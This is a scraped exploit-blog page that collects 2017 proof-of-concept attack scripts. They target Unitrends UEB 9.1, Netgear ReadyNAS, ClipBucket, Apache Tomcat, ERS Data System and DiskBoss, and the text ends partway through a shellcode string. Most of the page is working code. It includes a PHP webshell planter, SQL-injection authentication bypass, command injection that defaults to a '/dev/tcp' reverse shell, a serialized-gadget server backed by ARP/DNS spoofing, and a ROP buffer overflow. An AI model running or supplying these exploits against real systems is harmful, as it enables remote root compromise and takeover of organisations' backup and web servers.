# Exploit Title: Authenticated lowpriv RCE for Unitrends UEB 9.1
# Date: 08/08/2017
# Exploit Authors: Benny Husted, Jared Arave, Cale Smith
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
# Vendor Homepage: https://www.unitrends.com/
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
# Version: 9.1
# Tested on: CentOS6
# CVE: CVE-2017-12479
import httplib
import urllib
import ssl
import sys
import base64
import random
import time
import string
import json
from optparse import OptionParser
# Print some helpful words:
print """
###############################################################################
Authenticated lowpriv RCE for Unitrends UEB 9.1
Tested against appliance versions:
[+] 9.1.0-2.201611302120.CentOS6
This exploit utilizes some issues in UEB9 session handling to place a
php exec one liner in the webroot of the appliance.
Session tokens looks like this:
djA6NmM0ZWMzYTEtZmYwYi00MTIxLTk3YzYtMjQzODljM2EyNjY1OjE6L3Vzci9icC9sb2dzLmRpci9ndWlfcm9vdC5sb2c6MA==
and decodes to this:
LOG_LVL ----,
v --- UUID ----------------------- v v -- LOG_DIR -----------v v
v0:6c4ec3a1-ff0b-4121-97c6-24389c3a2665:1:/usr/bp/logs.dir/gui_root.log:0
The general steps that are followed by this poc are:
1. Authenticate as a low priv user and receive an auth token.
2. Modify the LOG_DIR field to point to a directory in the web root
with apache user write access, and make a request to an arbitrary resource.
This should touch a new file at the desired location.
3. Replace the UUID token in this auth token with a php shell_exec on liner,
and modify the LOG_LVL parameter to a value of 5, which will ensure
that the UUID is reflected into the log file.
4. Issue a final request, to generate a shell.php file with a single shell_exec.
This step is not strictly necessary.
###############################################################################
"""
# Disable SSL Cert validation
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
# Parse command line args:
usage = "Usage: %prog -r <appliance_ip> -u <username> -p <password>\n"\
parser = OptionParser(usage=usage)
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
help="Target host w/ UNITRENDS UEB installation")
parser.add_option("-u", '--username', dest='username', action="store",
help="User with any amount of privilege on unitrends device")
parser.add_option("-p", '--password', dest='password', action="store",
help="password for this user")
(options, args) = parser.parse_args()
if not options.rhost:
parser.error("[!] No remote host specified.\n")
elif options.rhost is None or options.username is None or options.password is None:
parser.print_help()
sys.exit(1)
RHOST = options.rhost
username = options.username
password = options.password
################################################################
# REQUEST ONE: GET A UUID.
################################################################
url1 = '/api/login'
a = {"username" : username,
"password" : password}
post_body = json.dumps(a)
headers1 = {'Host' : RHOST}
print "[+] Attempting to log in to {0}, {1}:{2}".format(RHOST, username, password)
conn = httplib.HTTPSConnection(RHOST, 443)
conn.set_debuglevel(0)
conn.request("POST", url1, post_body, headers=headers1)
r1 = conn.getresponse()
################################################################
# BUILD THE AUTH TOKENS THAT WE'LL USE IN AN ATTACK.
################################################################
parsed_json = json.loads(r1.read())
if 'auth_token' not in parsed_json:
print "[!] Didn't receive an auth token. Bad creds?"
exit()
auth_encoded = parsed_json['auth_token']
auth_decoded = base64.b64decode(auth_encoded)
uuid = auth_decoded.split(':')[1]
ssid = auth_decoded.split(':')[2]
# We'll place our command shell in /var/www/html/tempPDF, since apache
# has rw in this dir.
log_dir = "/var/www/html/tempPDF/"
log_file = ''.join(random.choice(string.ascii_lowercase) for _ in range(5)) + '.php'
log_lvl = "5"
shell = "<?php echo shell_exec($_GET['cmd']);?> >"
auth_mod1 = "v0:{0}:{1}:{2}{3}:{4}".format(uuid, ssid, log_dir, log_file, log_lvl)
auth_mod2 = "v0:{0}:{1}:{2}{3}:{4}".format(shell, ssid, log_dir, log_file, log_lvl)
auth_mod1 = base64.b64encode(auth_mod1)
auth_mod2 = base64.b64encode(auth_mod2)
url2 = '/api/summary/current/'
################################################################
# REQUEST 2: PUT A FILE
################################################################
print "[+] Making a request to place log to http://{0}/tempPDF/{1}".format(RHOST, log_file)
headers2 = {'Host' : RHOST,
'AuthToken' : auth_mod1}
# touch the file
conn.request("GET", url2, headers=headers2)
r2 = conn.getresponse()
print "[+] Making request to reflect shell_exec php to {0}.".format(log_file)
headers3 = {'Host' : RHOST,
'AuthToken' : auth_mod2}
# make the first command
time.sleep(.5)
conn.request("GET", url2, headers=headers3)
conn.close()
# optional cleanup time
print "[+] Making a request to generate clean shell_exec at http://{0}/tempPDF/shell.php".format(RHOST)
url4 = '/tempPDF/' + log_file
url4 += '?cmd=echo+-e+"<?php%20echo%20shell_exec(\$_GET[%27cmd%27]);?>"+>+shell.php'
conn1 = httplib.HTTPSConnection(RHOST, 443)
conn1.request("GET", url4, headers=headers2)
r3 = conn1.getresponse()
conn1.close()
url5 = "/tempPDF/shell.php"
print "[+] Checking for presence of http://{0}{1}".format(RHOST, url5)
headers3 = {'Host' : RHOST}
conn2 = httplib.HTTPSConnection(RHOST, 443)
conn2.request("GET", url5, headers=headers2)
r3 = conn2.getresponse()
if r3.status == 200:
print "[+] Got a 200 back. We did it."
print "[+] Example cmd: http://{0}{1}?cmd=id".format(RHOST, url5)
else:
print "Got a {0} back. Maybe this didn't work.".format(r3.status)
print "Try RCE here http://{0}/tempPDF/{1}?cmd=id".format(RHOST, log_file)
conn2.close()
# 3. Solution:
# Update to Unitrends UEB 10
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863151830
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
# Date: 08/08/2017
# Exploit Authors: Cale Smith, Benny Husted, Jared Arave
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
# Vendor Homepage: https://www.unitrends.com/
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
# Version: 9.1
# Tested on: CentOS6
# CVE: CVE-2017-12478
import httplib
import urllib
import ssl
import random
import sys
import base64
import string
from optparse import OptionParser
# Print some helpful words:
print """
###############################################################################
Unauthenticated root RCE for Unitrends UEB 9.1
Tested against appliance versions:
[+] 9.1.0-2.201611302120.CentOS6
This exploit leverages a sqli vulnerability for authentication bypass,
together with command injection for subsequent root RCE.
To use the exploit as written, make sure you're running a reverse
shell listener somewhere, using a command like:
$ nc -nlvp 1234
Then, just specify the ip and port of the remote listener in the
exploit command. Alternatively, modify this exploit to contain a
command of your choosing by modifying the 'cmd' variable below.
###############################################################################
"""
# Disable SSL Cert validation
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
# Parse command line args:
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
" %prog -c 'touch /tmp/foooooooooooo'"
parser = OptionParser(usage=usage)
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
help="Target host w/ UNITRENDS UEB installation")
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
help="Host listening for reverse shell connection")
parser.add_option("-p", '--LPORT', dest='lport', action="store",
help="Port on which nc is listening")
parser.add_option("-c", '--cmd', dest='cmd', action="store",
help="Run a custom command, no reverse shell for you.")
(options, args) = parser.parse_args()
if options.cmd:
if (options.lhost or options.lport):
parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mututally exclusive.\n")
elif not options.rhost:
parser.error("[!] No remote host specified.\n")
elif options.rhost is None or options.lhost is None or options.lport is None:
parser.print_help()
sys.exit(1)
RHOST = options.rhost
LHOST = options.lhost
LPORT = options.lport
if options.cmd:
cmd = options.cmd
else:
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
url = '/api/storage/'
# Here, a SQLi string overrides the uuid, providing auth bypass.
# We'll need to base64 encode before sending...
auth = base64.b64encode("v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0")
params = urllib.urlencode({'auth' : auth})
params = """{{"type":4,"name":"aaaaaaaa","usage":"archive","properties":{{"username":"km","password":"km","port":"445","hostname":"asdf.com","protocol":"cifs","share_name":"`{0}`"}}}}""".format(cmd)
headers = {'Host' : RHOST,
'Content-Type' : 'application/json',
'X-Requested-With' : 'XMLHttpRequest',
'AuthToken' : auth }
# Establish an HTTPS connection and send the payload.
conn = httplib.HTTPSConnection(RHOST, 443)
conn.set_debuglevel(1)
print """
[+] Sending payload to remote host [https://{0}]
[+] Here's some debug info:
""".format(RHOST)
conn.request("POST", url, params, headers=headers)
r1 = conn.getresponse()
print ""
print "[+] Request sent. Maybe your command was executed?"
print ""
# Print response, for debug purposes.
print r1.status, r1.reason
print r1.read()
# 3. Solution:
# Update to Unitrends UEB 10
# Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE
# Date: 27.09.2017
# Software Link: https://www.netgear.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
1. Description
$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.
https://security.szurek.pl/netgear-ready-nas-surveillance-14316-unauthenticated-rce.html
2. Proof of Concept
http://IP/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;sleep%205;%27
# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1
# Date: 08/08/2017
# Exploit Authors: Jared Arave, Cale Smith, Benny Husted
# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413
# Vendor Homepage: https://www.unitrends.com/
# Software Link: https://www.unitrends.com/download/enterprise-backup-software
# Version: 9.1
# Tested on: CentOS6
# CVE: CVE-2017-12477
import socket
import binascii
import struct
import time
import sys
from optparse import OptionParser
print """
###############################################################################
Unauthenticated root RCE for Unitrends UEB 9.1
Tested against appliance versions:
[+] 9.1.0-2.201611302120.CentOS6
This exploit uses roughly the same process to gain root execution
as does the apache user on the Unitrends appliance. The process is
something like this:
1. Connect to xinetd process (it's usually running on port 1743)
2. This process will send something like: '?A,Connect36092'
3. Initiate a second connection to the port specified
in the packet from xinetd (36092 in this example)
4. send a specially crafted packet to xinetd, containing the
command to be executed as root
5. Receive command output from the connection to port 36092
6. Close both connections
NB: Even if you don't strictly need output from your command,
The second connection must still be made for the command
to be executed at all.
###############################################################################
"""
# Parse command line args:
usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\
" %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'"
parser = OptionParser(usage=usage)
parser.add_option("-r", '--RHOST', dest='rhost', action="store",
help="Target host w/ UNITRENDS UEB installation")
parser.add_option("-l", '--LHOST', dest='lhost', action="store",
help="Host listening for reverse shell connection")
parser.add_option("-p", '--LPORT', dest='lport', action="store",
help="Port on which nc is listening")
parser.add_option("-c", '--cmd', dest='cmd', action="store",
help="Run a custom command, no reverse shell for you.")
parser.add_option("-x", '--xinetd', dest='xinetd', action="store",
type="int", default=1743,
help="port on which xinetd is running (default: 1743)")
(options, args) = parser.parse_args()
if options.cmd:
if (options.lhost or options.lport):
parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mutually exclusive.\n")
elif not options.rhost:
parser.error("[!] No remote host specified.\n")
elif options.rhost is None or options.lhost is None or options.lport is None:
parser.print_help()
sys.exit(1)
RHOST = options.rhost
LHOST = options.lhost
LPORT = options.lport
XINETDPORT = options.xinetd
if options.cmd:
cmd = options.cmd
else:
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)
def recv_timeout(the_socket,timeout=2):
the_socket.setblocking(0)
total_data=[];data='';begin=time.time()
while 1:
#if you got some data, then break after wait sec
if total_data and time.time()-begin>timeout:
break
#if you got no data at all, wait a little longer
elif time.time()-begin>timeout*2:
break
try:
data=the_socket.recv(8192)
if data:
total_data.append(data)
begin=time.time()
else:
time.sleep(0.1)
except:
pass
return ''.join(total_data)
print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
try:
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((RHOST,XINETDPORT))
except:
print "[!] Failed to connect!"
exit()
data = s1.recv(4096)
bpd_port = int(data[-8:-3])
print "[+] Connected! Cmd output will come back on {}:{}".format(RHOST, str(bpd_port))
print "[+] Connecting to bpdserverd on {}:{}".format(RHOST, str(bpd_port))
try:
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((RHOST, bpd_port))
except:
print "[!] Failed to connect!"
s1.close()
exit()
print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
print "[+] '{0}'".format(cmd)
if (len(cmd) > 240):
print "[!] This command is long; this might not work."
print "[!] Maybe try a shorter command..."
cmd_len = chr(len(cmd) + 3)
packet_len = chr(len(cmd) + 23)
packet = '\xa5\x52\x00\x2d'
packet += '\x00' * 3
packet += packet_len
packet += '\x00' * 3
packet += '\x01'
packet += '\x00' * 3
packet += '\x4c'
packet += '\x00' * 3
packet += cmd_len
packet += cmd
packet += '\x00' * 3
s1.send(packet)
print "[+] cmd packet sent!"
print "[+] Waiting for response from {0}:{1}".format(RHOST,str(bpd_port))
data = recv_timeout(s2)
print "[+] Here's the output -> \n\n"
print data
print "[+] Closing ports, exiting...."
s1.close()
s2.close()
# 3. Solution:
# Update to Unitrends UEB 10
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319
The following PoC bypasses the fix for the issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263)
PoC:
-->
function f() {
let o = {};
for (let i in {xx: 0}) {
for (i of [0]) {
}
print(o[i]);
}
}
f();
# Exploit Title: ClipBucket PHP Script Remote Code Execution (RCE)
# Date: 2017-10-04
# Exploit Author: Esecurity.ir
# Vendor Homepage: https://clipbucket.com/
# Version: 2.8.3
# Exploit Code By : Meisam Monsef - Email : meisamrce@gmail.com - TelgramID : @meisamrce
# Usage Exploit : exploit.py http://target.com/path/
import sys,os
try:
import requests
except Exception as e:
print 'please install module requests!'
sys.exit()
img = 'temp.jpg'
uploadUrl = "api/file_uploader.php"
h = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'}
def getShell(url):
try:
r = requests.get(url+'cache/1.log',headers=h)
if r.status_code == 200:
return r.content
else:
print 'Sorry site is not vulnerable '
sys.exit()
except Exception as e:
print e
sys.exit()
def exploit(url):
while (1):
cmd = raw_input('$')
if cmd == '' or cmd == 'exit':
break
file_ = {'Filedata': (img, open(img, 'r'),'image/jpg')}
data = {'file_name':'a.jpg;'+cmd+' > ../cache/1.log;a.jpg'}
try:
r = requests.post(url+uploadUrl, files=file_,data=data,headers=h)
if r.status_code == 200:
if '"success":"yes"' in r.content:
print getShell(url)
else:
print 'Sorry site is not vulnerable '
break
else:
print 'Sorry site is not vulnerable '
break
except Exception as e:
print e
break
if not os.path.exists(img):
print 'please create tiny image file name is ' + img
sys.exit()
if len(sys.argv) == 2 :
exploit(sys.argv[1])
else:
print "Usage Exploit : exploit.py http://target.com/path/";
# E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
When running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request.
This JSP could then be requested and any code it contained would be executed by the server.
The PoC is like this:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26
<% out.println("hello");%>
It is the bypass for CVE-2017-12615
# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability
# Google Dork: N/A
# Date: 9/21/2017
# Exploit Author: West Shepherd
# Vendor Homepage: http://www.ersdata.com
# Software Link: www.ersdata.com/downloads/ErsSetup.exe
# Version: 1.8.1.0
# Tested on: Windows 7 x86
# CVE : CVE-2017-14702
# Description:
# ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of
# com.branaghgroup.ecers.update.UpdateRequest deserialization.
# Exploitaiton:
# The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311.
# To redirect requests from the thick client to the attacking machine, enable packet forwarding:
#!/bin/bash
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -F INPUT
#iptables -F FORWARD
#iptables -F OUTPUT
#iptables -F -t nat
#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE
#iptables -P INPUT ACCEPT
#iptables -P FORWARD ACCEPT
#iptables -P OUTPUT ACCEPT
# Then poison DNS requests to the www.ersdata.com domain:
# DNS Spoof https://github.com/devleoper/arp-dns-spoof
# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP ="
# domain = 'www.ersdata.com' # domain to be spoofed
# localIP = '192.168.85.131' # IP address for poisoned hosts.
# Run the request handler on the attacking machine, which will answer all requests with malicous serialized gadgets. For example:
#!/usr/bin/python
import SocketServer, sys
from SimpleHTTPServer import SimpleHTTPRequestHandler
# POST Handler
class HTTPHandler(SimpleHTTPRequestHandler):
def __init__(self,req,client_addr,server):
SimpleHTTPRequestHandler.__init__(self,req,client_addr,server)
def do_POST(self):
# java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin
# python -c 'import binascii, re;print "\\x"+"\\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))'
response = ( "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", len(response))
self.end_headers()
self.wfile.write(response)
try:
httpd = SocketServer.TCPServer(("", 3311), HTTPHandler)
print "Serving at port: ", 3311
httpd.serve_forever()
except:
print "Exiting..."
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: C4t0ps1s
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution)
# Date: 03-10-2017
# Twitter: @C4t0ps1s
# Email: C4t0ps1s@gmail.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 10 x64
#
# Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/
#
# To reproduce the code execution:
# 1. Click Server
# 2. Click Connect
# 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect
#
#========================================================================================================================
import struct
buff = "a"*1312
#push esp | pop esi | retn 4
buff += struct.pack("<L",0x65247445)
#mov eax, esi | pop esi | retn 4
buff += struct.pack("<L",0x65273f24)
buff += "PADD"
buff += "PADD"
#pop ebx | retn
buff += struct.pack("<L",0x65222936)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += struct.pack("<L",0x0101015a)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
#jmp eax
buff += struct.pack("<L",0x65217d28)
#inc eax
buff += "\x40"*20
#msfvenom -a x86 --platform windows -p windows/exec CMD="calc.exe" -e x86/alpha_mixed BufferRegister=EAX -f raw
sc = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
sc += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
